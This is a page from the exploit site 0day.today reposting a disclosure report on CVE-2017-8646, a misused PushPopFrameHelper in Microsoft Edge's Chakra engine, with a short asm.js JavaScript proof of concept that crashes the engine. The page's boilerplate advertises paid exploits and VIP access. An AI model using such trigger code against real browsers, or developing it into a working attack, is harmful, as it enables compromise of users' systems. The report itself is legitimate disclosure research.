0day.today - 最大、世界でのデータベースを利用します。
![](/img/logo_green.jpg)
- 私たちは一つのメインのドメインを使用します。http://0day.today
- 材料のほとんどは 完全に無料
- あなたがしたい場合は エクスプロイトを購入 / V.I.P.を取得アクセス または任意の他のサービスのために支払います、
あなたが購入したり、獲得する必要があります金
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
次の方法でご連絡することができます:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Microsoft Edge Chakra PushPopFrameHelper Incorrect Usage Exploit
Microsoft Edge: Chakra: Incorrect usage of PushPopFrameHelper in InterpreterStackFrame::ProcessLinkFailedAsmJsModule CVE-2017-8646 PushPopFrameHelper is a class that pushes the current stack frame object in its constructor and pops it in the destructor. So it should be used like "PushPopFrameHelper holder(...)", but InterpreterStackFrame::ProcessLinkFailedAsmJsModule uses it like a function. Var InterpreterStackFrame::ProcessLinkFailedAsmJsModule() { ... PushPopFrameHelper(newInstance, _ReturnAddress(), _AddressOfReturnAddress()); ... } It pushes "newInstance" and immediately pop it. The PoC will crash in the following code. void BailOutRecord::ScheduleLoopBodyCodeGen(Js::ScriptFunction * function, Js::ScriptFunction * innerMostInlinee, BailOutRecord const * bailOutRecord, IR::BailOutKind bailOutKind) { ... Js::InterpreterStackFrame * interpreterFrame = executeFunction->GetScriptContext()->GetThreadContext()->GetLeafInterpreterFrame(); <<-- Invalid stack frame object loopHeader = executeFunction->GetLoopHeader(interpreterFrame->GetCurrentLoopNum()); <<-- interpreterFrame->GetCurrentLoopNum() == -1 ... } PoC: function asmModule() { 'use asm'; let a = [1, 2, 3, 4]; for (let i = 0; i < 0x100000; i++) { // JIT a[0] = 1; if (i === 0x30000) { a[0] = {}; // the array type changed, bailout!! } } function f(v) { v = v | 0; return v | 0; } return f; } asmModule(1); This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt # 0day.today [2024-07-01] #